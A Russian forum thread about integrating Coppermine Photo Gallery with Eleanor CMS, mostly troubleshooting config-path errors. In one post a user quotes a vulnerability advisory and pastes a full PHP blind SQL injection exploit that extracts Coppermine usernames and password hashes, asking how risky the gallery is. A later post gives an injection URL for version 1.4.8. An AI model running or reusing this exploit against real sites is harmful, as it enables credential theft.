X   Сообщение сайта
(Сообщение закроется через 2 секунды)

Здравствуйте, гость ( Вход | Регистрация )

 
Ответить в данную темуНачать новую тему
> Интеграция с Coppermine Photo Gallery, Файл обновлен: 11 Jul 2009
Alexander
сообщение 2009-07-11, 1:44
Сообщение #1
Eleanor developer
Иконка группы

Группа: Администраторы
Сообщений: 5 259
Регистрация: 2008-11-11
Из: Николаев
Версия системы: RC5

Репутация:   нет  
Всего: 67


Интеграция с Coppermine Photo Gallery

Версия: 1.0.0
Раздел: Бесплатные дополнения

Описание:
Позволяет интегрировать Вашу копию Eleanor CMS с популярным движком для создания фото галерей Coppermine Photo Gallery
Даная интеграция позволяет Вам интегрировать Coppermine Photo Gallery с Вашей копией Eleanor CMS.
Coppermine Photo Gallery - очень популярный движок для создания фотогалерей, он уже оснащен всем необходимым и под него написано довольно много полезных разработок. Поэтому, чем писать собственную галерею для системы - лучше воспользоваться уже готовым бесплатным и прекрасным.

Посмотреть файл

Подтверждение Alexander, от 11.7.2009, 1:44
Перейти в начало страницы
+Цитировать сообщение
Jon
сообщение 2009-07-14, 9:44
Сообщение #2
Любитель
Иконка группы

Группа: Бета-тестеры
Сообщений: 282
Регистрация: 2009-07-12
Из: Москва

Репутация:   нет  
Всего: 0


Сделал всё по инструкции...
Fatal error: require_once() [function.require]: Failed opening required '/config_general.php' (include_path='.:') in /home/****/domains/*****.ua/public_html/gallery/bridge/eleanor_cms.inc.php on line 37
Перейти в начало страницы
+Цитировать сообщение
NoIndex
сообщение 2009-07-14, 10:00
Сообщение #3
Опытный
Иконка группы

Группа: Бета-тестеры
Сообщений: 825
Регистрация: 2008-12-13
Из: Россия → Новосибирск
Версия системы: RC5

Репутация:   нет  
Всего: 24


Как бы не может найти файл config_general.php :-)

В «Менеджер интеграции», что указывали?
Надо (в моём случаи система стоит локально, в папке eleanor):
Цитата
Ссылка форума: http://localhost/eleanor
Относительный путь к файлу конфигурации Вашего форума: ../eleanor/
Префикс Cookie:


Сообщение отредактировал NoIndex - 2009-07-14, 10:04
Перейти в начало страницы
+Цитировать сообщение
kdv1978
сообщение 2009-07-17, 8:46
Сообщение #4
Любитель
Иконка группы

Группа: Eleanor user
Сообщений: 239
Регистрация: 2009-07-03

Репутация:   нет  
Всего: 5


Jon, если получилось установить выложи ссылку где можно взглянуть на галерею, или может кто ещё устанавливал - покажите что получилось.
Перейти в начало страницы
+Цитировать сообщение
Screatch
сообщение 2009-07-17, 11:36
Сообщение #5
Опытный
Иконка группы

Группа: Eleanor TEAM
Сообщений: 717
Регистрация: 2008-11-11
Из: Таллинн

Репутация:   нет  
Всего: 20


Я на локалке устанавливал всё работает как часы..
Реализован только совместный вход / выход с обоих концов.
Перейти в начало страницы
+Цитировать сообщение
myk0lka
сообщение 2009-08-26, 14:32
Сообщение #6
Новичок
Иконка группы

Группа: Персона нон грата
Сообщений: 74
Регистрация: 2009-05-08
Из: Москва

Репутация:   нет  
Всего: 2


Нашел на просторах рунета:

Цитата
Программа: Coppermine Photo Gallery 1.3.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «pid» сценарием addfav.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.


<?
# Coppermine Photo Gallery 1.3.x Blind SQL Injection Exploit
# by s0cratex, RTM Member
# Visit: www.zonartm.org

/*
You need make a small work... Add a fav pic, enter to the site and add
/addfav.php?pid=2 for example..xD
... in the line: if(eregi("download",fgets($cnx2))){ $pass.=chr($i); echo
chr($i); break; }  }
the word "download" depends of the language...
*/

# saludos a rgod, OpTix, crypkey &#39;n mechas...

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$host = "localhost"; $path = "/cpg"; $port = "80";
$id = "1";

echo "Coppermine Photo Gallery 1.3.x fav Blind SQL Injection Exploit\n";
echo "--------------------------------------------------------------\n";
echo "\n";
echo "Username -> ";
$j = 1; $user = "";
while(!strstr($user,chr(0))){
for($x=0;$x<255;$x++){
$xpl = "&#39;&#39;) OR 1=(SELECT (IF((ASCII(SUBSTRING(user_name,".$j.",1))=".$x."),1,0)) FROM cpg131_users WHERE user_id=".$id.")/*";
$xpl = "a:1:{i:0;s:".strlen($xpl).":\"".$xpl."\";}";
$xpl = base64_encode($xpl);
$cnx = fsockopen($host,$port);
fwrite($cnx, "GET ".$path."/thumbnails.php?album=favpics HTTP/1.0\r\nCookie: cpg131_fav=".$xpl."\r\n\r\n");
while(!feof($cnx)){
if(eregi("download",fgets($cnx))){ $user.=chr($x); echo chr($x); break; }  }
fclose($cnx);
if ($x==255) {
die("\n Try again..."); }
}
$j++;
}
echo "\n";
echo "Password -> ";
$a = 1; $pass = "";
while(!strstr($pass,chr(0))){
for($i=0;$i<255;$i++){
$xpl = "&#39;&#39;) OR 1=(SELECT (IF((ASCII(SUBSTRING(user_password,".$a.",1))=".$i."),1,0)) FROM cpg131_users WHERE user_id=".$id.")/*";
$xpl = "a:1:{i:0;s:".strlen($xpl).":\"".$xpl."\";}";
$xpl = base64_encode($xpl);
$cnx2 = fsockopen($host,$port);
fwrite($cnx2, "GET ".$path."/thumbnails.php?album=favpics HTTP/1.0\r\nCookie: cpg131_fav=".$xpl."\r\n\r\n");
while(!feof($cnx2)){
if(eregi("download",fgets($cnx2))){ $pass.=chr($i); echo chr($i); break; }
}
fclose($cnx2);
if ($i==255) {
die("\n Try again..."); }
}
$a++;
}
echo "--------------------------------------------------------------\n";
echo "s0cratex@zonartm.org || if you speak spanish->MSN: s0cratex@hotmail.com ..xD\n";
echo "www.zonartm.org/blog/s0cratex\n";
echo "plexinium.com comming soon <- Hacking Nica\n";
?>


Сам я не могу оценить на сколько всё приведённое выше серьёзно, а потому может кто-то отпишется по этому поводу? На сколько скрипт галереи делает сайт уязвимым?

Сообщение отредактировал myk0lka - 2009-08-26, 14:35
Перейти в начало страницы
+Цитировать сообщение
Гость_Ripper_*
сообщение 2009-08-26, 15:22
Сообщение #7



Гости





Цитата (myk0lka @ 26.8.2009, 15:32)
Сам я не могу оценить на сколько всё приведённое выше серьёзно, а потому может кто-то отпишется по этому поводу? На сколько скрипт галереи делает сайт уязвимым?

Если эта уязвимость отсносится к установленной у вас версии Coppermine (если она 1.3.x), то хакер вполне может захватить и Coppermine, и Eleanor :) Поудалять новости, ещё чего попортить...
Но сейчас вроде вышла уже 1.4 .. В ней этой уязвимости может не быть
Перейти в начало страницы
+Цитировать сообщение
myk0lka
сообщение 2009-08-26, 15:46
Сообщение #8
Новичок
Иконка группы

Группа: Персона нон грата
Сообщений: 74
Регистрация: 2009-05-08
Из: Москва

Репутация:   нет  
Всего: 2


Да, уже нашел 1.4.... Но пока все же ставить не буду..... Поищу что есть подобного по ней....

И кстати: а эта интеграция с 1.4 совместима?

UPD:
Не буду я пока эту галерею ставить:)

Цитата
Программа: Coppermine Photo Gallery 1.4.8, возможно более ранние версии

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в HTTP заголовках "referer" и "user-agent" в функции "add_hit()". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Удачная эксплуатация уязвимости возможна при выключенной опции "magic_quotes_gpc".

Пример:

/cpg/displayimage.php?album=random&cat=0&pos=-{Not Viewd Image ID}


Хотя про 1.4.25 (последняя версия на их сайте) я пока ничего не нашёл.....

Сообщение отредактировал myk0lka - 2009-08-26, 16:00
Перейти в начало страницы
+Цитировать сообщение
azacgrus
сообщение 2009-08-27, 23:20
Сообщение #9
Любитель
Иконка группы

Группа: Eleanor user
Сообщений: 246
Регистрация: 2008-12-13
Из: Санкт-Петербург

Репутация:   нет  
Всего: 12


Цитата
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

очень безопасно без твоего ведома выполнять запросы:)
Перейти в начало страницы
+Цитировать сообщение
Гость_Free3e_*
сообщение 2009-09-23, 15:33
Сообщение #10



Гости





c 1.4.25 проблема, когда интеграция включена, невозможно просмотреть пользователей в галлерее.... Как решить такую проблему?

И еще как сделать так: когда неавторизированный юзер входит в галлерею ему выдавало редирект не на вход в галлерею а вход на сайт....

Сообщение отредактировал Free3e - 2009-09-23, 20:49
Перейти в начало страницы
+Цитировать сообщение
Alexander
сообщение 2009-09-23, 23:51
Сообщение #11
Eleanor developer
Иконка группы

Группа: Администраторы
Сообщений: 5 259
Регистрация: 2008-11-11
Из: Николаев
Версия системы: RC5

Репутация:   нет  
Всего: 67


Free3e, странно. А почему нельзя?
Перейти в начало страницы
+Цитировать сообщение
Гость_Free3e_*
сообщение 2009-09-24, 20:58
Сообщение #12



Гости





Вот так не получается кидает на странницу настроек (конфига галлереи) а если она выключенна все работает...
Перейти в начало страницы
+Цитировать сообщение
Alexander
сообщение 2009-09-26, 12:44
Сообщение #13
Eleanor developer
Иконка группы

Группа: Администраторы
Сообщений: 5 259
Регистрация: 2008-11-11
Из: Николаев
Версия системы: RC5

Репутация:   нет  
Всего: 67


Free3e, тут смотреть надо. Скиньте данные для доступа по личке - посмотрим.
Перейти в начало страницы
+Цитировать сообщение
Гость_Мирт_*
сообщение 2010-02-27, 6:53
Сообщение #14



Гости





как эта интеграция будет работать, если установлена интеграция IPB и вообще совместимы ли они?
Перейти в начало страницы
+Цитировать сообщение
c0wb0y
сообщение 2011-03-24, 8:50
Сообщение #15
Любитель
Иконка группы

Группа: Партнеры
Сообщений: 164
Регистрация: 2008-12-13
Из: Казахстан

Репутация:   нет  
Всего: 2


Скажите, а эта интеграция будет работать на RC5?
Перейти в начало страницы
+Цитировать сообщение
c0wb0y
сообщение 2011-03-24, 11:41
Сообщение #16
Любитель
Иконка группы

Группа: Партнеры
Сообщений: 164
Регистрация: 2008-12-13
Из: Казахстан

Репутация:   нет  
Всего: 2


Проверил, не работает. :(

Fatal error: require_once() [function.require]: Failed opening required '/config_general.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/***/public_html/gallery/bridge/eleanor_cms.inc.php on line 37
Перейти в начало страницы
+Цитировать сообщение
Alexander
сообщение 2011-03-24, 18:13
Сообщение #17
Eleanor developer
Иконка группы

Группа: Администраторы
Сообщений: 5 259
Регистрация: 2008-11-11
Из: Николаев
Версия системы: RC5

Репутация:   нет  
Всего: 67


c0wb0y, напишите мне на мыло.. За пару долларов - все исправим :)
Перейти в начало страницы
+Цитировать сообщение
termit
сообщение 2011-05-04, 1:28
Сообщение #18
Опытный
Иконка группы

Группа: Бета-тестеры
Сообщений: 705
Регистрация: 2009-06-02
Из: Житомир

Репутация:   нет  
Всего: 11


Цитата (c0wb0y @ 2018-10-18 14:17)
Проверил, не работает.

Fatal error: require_once() [function.require]: Failed opening required '/config_general.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/***/public_html/gallery/bridge/eleanor_cms.inc.php on line 37

Попробуйте на Coppermine 1.4.25 :)

Сообщение отредактировал termit - 2011-05-04, 1:29
Перейти в начало страницы
+Цитировать сообщение

Ответить в данную темуНачать новую тему
0 чел. читают эту тему (гостей: 0, скрытых пользователей: 0)
Пользователей: 0

 
RSS Текстовая версия 0.0568 сек.    11 запросов    GZIP включен    Сейчас: 2018-10-18, 13:17